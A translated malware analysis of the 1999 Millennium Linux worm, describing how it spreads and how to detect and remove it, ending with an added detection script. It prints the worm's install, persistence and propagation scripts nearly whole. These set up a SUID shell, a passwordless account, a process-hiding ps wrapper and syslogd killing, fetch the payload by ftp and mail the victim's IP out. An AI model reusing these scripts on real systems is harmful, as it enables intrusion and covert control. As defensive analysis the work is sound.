Analysis of a worm under Linux

From: Max Vision's analysis of a worm under Linux
Translation: QUACK
Source: Security Focus

1. Introduction

The Millennium Internet Worm (abbreviated below as the Worm) consists of scripts and programs. What it does is use several remote vulnerabilities of Linux systems to gain entry to a system, copy itself there, and continue reproducing. The Worm discovered so far exploits well-known vulnerabilities in imap4 v10.x, Qualcomm popper, bind and rpc.mountd on x86. It also does one good thing: it fixes the security vulnerabilities it used...

2. Technical analysis

The earliest appearance of the Worm is said to be in the remote exploit ADMmountd2 (a program that attacks the Linux rpc.mountd service and can obtain the highest privilege; not detailed here). The ADM group, however, denied authorship of the posted code containing the Trojan and classified it among counterfeit ADM works; see ftp://adm.freelsd.net/ADM/FAKES/ [maintained by ndubee@df.ru]. The Trojan is placed in a so-called updated version of ADMmountd that claims to be more practical, but in fact the hidden code sits in ADMgetip.c. ADM has restricted download of this tool from its site, so I provide it to everyone here, for educational purposes only. This Trojan horse was discovered on 1999-8-15. You can download ADMgetip-trojan-version.c at http://focus.silversand.net/newsite/tool/adm_fake.c.
1. The Trojan code in ADMgetip.c carries mworm.tgz as uuencoded data. When the program runs, it unpacks the archive into /var/tmp/tmp and executes a program called wormup. The code segment is as follows:

    /* Trojan code from the admgetip.c file */
    fp = fopen("/var/tmp/tmp", "w");              /* open the drop file */
    if (getuid() != 0) {                          /* check whether the uid is root */
        fprintf(stderr, "Operation not permitted\n");
        exit(0);
    }
    fprintf(fp, "begin-base64 644 mworm.tgz\n"
            [large uuencoded mworm.tgz here]
            "====\n");                            /* this is a long uuencoded blob */
    system("(cd /var/tmp; uudecode

The decoded mworm.tgz contains the following files:

    -rwxr-xr-x 1 root root  8647 Dec 31 1999 hnamed*
    -rwxr-xr-x 1 root root  5173 Dec 31 1999 hnamed.c*
    -rwxr-xr-x 1 root root   477 Dec 31 1999 ip*
    -rwxr-xr-x 1 root root  1728 Dec 31 1999 readme-admins*
    -rwxr-xr-x 1 root root  5749 Dec 31 1999 bd*
    -rwxr-xr-x 1 root root  1340 Dec 31 1999 bd.c*
    -rwxr-xr-x 1 root root     0 Dec 31 1999 cmd*
    -rwxr-xr-x 1 root root  5292 Dec 31 1999 ftpscan*
    -rwxr-xr-x 1 root root   911 Dec 31 1999 ftpscan.c*
    -rwxr-xr-x 1 root root  8750 Dec 31 1999 ftpx*
    -rwxr-xr-x 1 root root  5108 Dec 31 1999 ftpx.c*
    -rwxr-xr-x 1 root root  2398 Dec 31 1999 getip.c*
    -rwxr-xr-x 1 root root  6436 Dec 31 1999 im*
    -rwxr-xr-x 1 root root  2634 Dec 31 1999 im.c*
    -rwxr-xr-x 1 root root   151 Dec 31 1999 infect*
    -rwxr-xr-x 1 root root     1 Dec 31 1999 infected*
    -rwxr-xr-x 1 root root  2755 Dec 31 1999 ip_icmp.h*
    -rwxr-xr-x 1 root root  6175 Dec 31 1999 mount.h*
    -rwxr-xr-x 1 root root  5152 Dec 31 1999 mount.x*
    -rwxr-xr-x 1 root root  2222 Dec 31 1999 mount_clnt.c*
    -rwxr-xr-x 1 root root  3178 Dec 31 1999 mount_svc.c*
    -rwxr-xr-x 1 root root  2366 Dec 31 1999 mount_xdr.c*
    -rwxr-xr-x 1 root root 13048 Dec 31 1999 mountd*
    -rwxr-xr-x 1 root root  7723 Dec 31 1999 mountd.c*
    -rwxr-xr-x 1 root root   668 Dec 31 1999 mwd*
    -rwxr-xr-x 1 root root   561 Dec 31 1999 mwd-ftp*
    -rwxr-xr-x 1 root root   448 Dec 31 1999 mwd-imap*
    -rwxr-xr-x 1 root root   355 Dec 31 1999 mwd-mountd*
    -rwxr-xr-x 1 root root   529 Dec 31 1999 mwd-pop*
    -rwxr-xr-x 1 root root   755 Dec 31 1999 mwi*
    -rwxr-xr-x 1 root root   844 Dec 31 1999 mworm*
    -rwxr-xr-x 1 root root  4617 Dec 31 1999 mwr*
    -rwxr-xr-x 1 root root   407 Dec 31 1999 mwr.c*
    -rwxr-xr-x 1 root root  5849 Dec 31 1999 mws*
    -rwxr-xr-x 1 root root  1522 Dec 31 1999 mws.c*
    -rwxr-xr-x 1 root root  1439 Dec 31 1999 pgp*
    -rwxr-xr-x 1 root root  1226 Dec 31 1999 prepare*
    -rwxr-xr-x 1 root root  5430 Dec 31 1999 q*
    -rwxr-xr-x 1 root root  1350 Dec 31 1999 qc*
    -rwxr-xr-x 1 root root  6785 Dec 31 1999 qp*
    -rwxr-xr-x 1 root root  2886 Dec 31 1999 qp.c*
    -rwxr-xr-x 1 root root  5680 Dec 31 1999 remotecmd*
    -rwxr-xr-x 1 root root  1834 Dec 31 1999 remotecmd.c*
    -rwxr-xr-x 1 root root  7286 Dec 31 1999 test*
    -rwxr-xr-x 1 root root  4355 Dec 31 1999 test.c*
    -rwxr-xr-x 1 root root  1037 Dec 31 1999 wormup*

Once the archive is unpacked, the first thing executed is the wormup script, whose content is as follows:

    # cat wormup
    #!/bin/sh
    # Millennium Worm Script
    # ./wormup -dist = create a new build
    # ./wormup &     = install the worm (root)

    if [ x$1 = "x-dist" ]; then
      echo "Creating Millennium Worm Distribution."
      indent *.c
      rm -f *~
      echo -n "compiling: "
      for c in hnamed q bd im qp ftpscan mwr remotecmd ftpx mws test
      do
        rm -f $c
        gcc -Wall -O2 ${c}.c -o $c
        echo -n $c " "
      done
      rm -f mountd
      rpcgen -C mount.x && gcc -Wall -O2 mountd.c -o mountd > /dev/null 2> /dev/null
      echo "mountd ..done"
      echo -n "fixing misc. file stuff ..."
      printf "" > cmd
      printf "0" > infected
      chmod 755 *
      touch -t 010100002000.00 *
      echo "done."
      rm -f mworm.tgz
      tar czf mworm.tgz *
      echo "Finished. mworm.tgz recreated."
      exit 0
    fi
    if [ $UID != 0 ]; then
      echo "you need root to screen machine, sorry."
      exit 0
    fi
    cp /bin/sh /bin/.mwsh && chmod 4755 /bin/.mwsh
    mkdir /tmp/... && cp mworm.tgz /tmp/...
    echo "mw::2222:555:Millennium Worm:/:/bin/sh" >> /etc/passwd
    cd /tmp/... && tar xzvf mworm.tgz
    ./mworm > /dev/null 2> /dev/null &
    echo "Millennium Worm (TM). PHEAR THY UNIX LIKE THYSELF."

With the -dist option, this script does the following: it deletes and recompiles the binaries in mworm.tgz, clears the cmd file (which is filled during network infection), resets the infected file, sets the timestamp of every file to 2000-1-1 00:00:00, and recreates mworm.tgz, which is then placed in /var/tmp.

2. Behaviour on the local machine

When installed on a machine, the worm runs the wormup script, which does the following: creates a SUID root shell, /bin/.mwsh, and launches the worm. After the worm is started it adds itself to /etc/rc.d/rc.local and /etc/profile, sends the system's IP address to the e-mail address trax31337@hotmail.com, and copies itself to the three locations above. Its behaviour on the network is to scan and attack freely; on machines where it obtains root and installs itself, the worm is activated and joins in the attack and infection. Remember that the script has a -dist option that is not used at install time. First, let's see what it does: it builds the SUID root shell /bin/.mwsh, adds to /etc/passwd an account named mw with UID 2222 and an empty password, unpacks mworm.tgz into /tmp/..., and executes mworm:

    # cat mworm
    #!/bin/.mwsh
    # Millennium Worm by Anonymous
    # if you find this on your machine, but didn't download it
    # well .. you have a problem :)
    export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:."
    export IP_A=`./ip`
    ./prepare
    # prepare for your d00m mortalz
    cat << _EOF_ > cmd
    mw
    mw
    mw
    mw
    mw
    /bin/.mwsh -c "/usr/sbin/named" &
    export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:"
    mkdir /tmp/...
    cd /tmp/...
    if [ -f /tmp/.x12 ]
    then
    logout
    fi
    ftp $IP_A
    mw
    cd /tmp/...
    get mworm.tgz
    bye
    tar xvzf mworm.tgz
    touch /tmp/.x12
    nohup ./mworm &
    ./ip | mail `printf "\x74\x72\x61\x78\x33\x31\x33\x33\x37\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
    logout
    _EOF_
    ./mwd &
    ./mwd-pop &
    ./mwd-imap &
    ./mwd-mountd &
    ./mwd-ftp &
    sleep 60
    nohup ./mwd &
    nohup ./mwd-pop &
    nohup ./mwd-mountd &
    nohup ./mwd-ftp &
    /bin/.mwsh -c ./bd

This script appears to be the core of the Worm. It performs the following functions: runs the prepare script (listed below); creates the cmd script, whose commands are executed on the target machine; sends an e-mail containing the host's IP address to trax31337@hotmail.com (the hex-escaped string in the printf call); launches the daemons mwd, mwd-pop, mwd-imap, mwd-mountd and mwd-ftp; and runs bd, a back door that binds port 1338 and gives a root shell after authentication with the password "Millennium".

    # cat prepare
    #!/bin/.mwsh
    # Millennium Worm Preparation File
    # this sets up the stuff to make sure your
    # machine was owned in a neat and proper way ;D
    export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:."
    if [ -f /bin/.ps ]
    then
      printf ""
    else
      ./readme-admins > /dev/null 2> /dev/null &
      mv /bin/ps /bin/.ps
      echo "/bin/.ps \$* | grep -v ps | grep -v mw | grep -v grep" >> /bin/ps
      chmod 755 /bin/ps
      if [ -f /etc/rc.d/rc.local ]
      then
        echo "(sleep 10; cd /tmp/.../; ./mworm > /dev/null &)" >> /etc/rc.d/rc.local
      else
        echo "(sleep 10; cd /tmp/.../; ./mworm > /dev/null &)" >> /etc/profile
      fi
      chattr +ia /tmp/.../*.c /tmp/.../mwd* /tmp/.../prepare /bin/.mwsh
      chattr +ia /etc/rc.d/rc.local /etc/profile /tmp/.../mwo* /tmp/.../ip
      chattr -ia /tmp/.../mount_*.c
    fi
    killall -q -9 syslogd
    gcc -Wall -O2 hnamed.c -o hnamed
    gcc -Wall -O2 mwr.c -o mwr
    gcc -Wall -O2 q.c -o q
    gcc -Wall -O2 remotecmd.c -o remotecmd
    gcc -Wall -O2 test.c -o test
    gcc -Wall -O2 bd.c -o bd
    gcc -Wall -O2 im.c -o im
    gcc -Wall -O2 qp.c -o qp
    gcc -Wall -O2 mws.c -o mws
    gcc -Wall -O2 ftpscan.c -o ftpscan
    gcc -Wall -O2 ftpx.c -o ftpx
    rpc=`which rpcgen`
    which rpcgen && $rpc -C mount.x && gcc -Wall -O2 mountd.c -o mountd
    /bin/.mwsh -c ./bd &

Without saying more, this script does the following: runs readme-admins, which secures the host; replaces ps with a wrapper that hides the Worm's processes; adds the Worm to the rc file (or /etc/profile if there is no rc.local); marks the Worm's files and the rc file immutable with chattr so they cannot be deleted (root can clear the attribute again); kills syslogd; recompiles the tools; and runs bd, which opens a root shell on port 1338 that allows remote root login with the password "Millennium".

3. Removing the worm

1. Detecting an infected host: check /etc/passwd for the mw account with an empty password
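The traces listed above (the mw passwd entry, the restart line in rc.local or /etc/profile, the SUID /bin/.mwsh, the /tmp/... directory and the moved /bin/.ps) can be checked with a script like the following. It is an added example, not part of Max Vision's analysis; it assumes a base directory argument (a mounted image, or the constructed fixture it builds itself) so it runs offline.

```sh
#!/bin/sh
# Checks a host for the Millennium Worm indicators named in the analysis.
# Added example, not Max Vision's code. Pass a base directory (a mounted
# image or the constructed fixture below) so it can run offline.

# 0 if the passwd file carries the worm's "mw" account (UID 2222, empty password).
mworm_passwd_infected() {
    grep -q '^mw::2222:' "$1"
}

# 0 if an rc file carries the restart line the prepare script appends.
mworm_rc_infected() {
    grep -q '/tmp/\.\.\./.*mworm' "$1"
}

# 0 if the planted shell exists and is set-uid (/bin/.mwsh, mode 4755).
mworm_suid_shell() {
    [ -u "$1" ]
}

# Scans under base dir $1; prints each indicator found, returns 0 if infected.
mworm_scan() {
    base="$1"; found=1
    mworm_passwd_infected "$base/etc/passwd" 2>/dev/null &&
        { echo "mw account in $base/etc/passwd"; found=0; }
    for rc in "$base/etc/rc.d/rc.local" "$base/etc/profile"; do
        [ -f "$rc" ] && mworm_rc_infected "$rc" &&
            { echo "worm restart line in $rc"; found=0; }
    done
    mworm_suid_shell "$base/bin/.mwsh" && { echo "suid shell $base/bin/.mwsh"; found=0; }
    [ -d "$base/tmp/..." ] && { echo "worm directory $base/tmp/..."; found=0; }
    [ -f "$base/bin/.ps" ] && { echo "real ps moved to $base/bin/.ps; ps is a wrapper"; found=0; }
    return "$found"
}

# Constructed fixture reproducing the traces left by wormup and prepare.
mworm_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/rc.d" "$d/bin" "$d/tmp/..."
    printf 'root:x:0:0:root:/root:/bin/sh\nmw::2222:555:Millennium Worm:/:/bin/sh\n' > "$d/etc/passwd"
    echo '(sleep 10; cd /tmp/.../; ./mworm > /dev/null &)' >> "$d/etc/rc.d/rc.local"
    : > "$d/bin/.mwsh" && chmod 4755 "$d/bin/.mwsh"
    echo "$d"
}

# On a live host run: mworm_scan ""   (paths then resolve to /etc/passwd etc.)
```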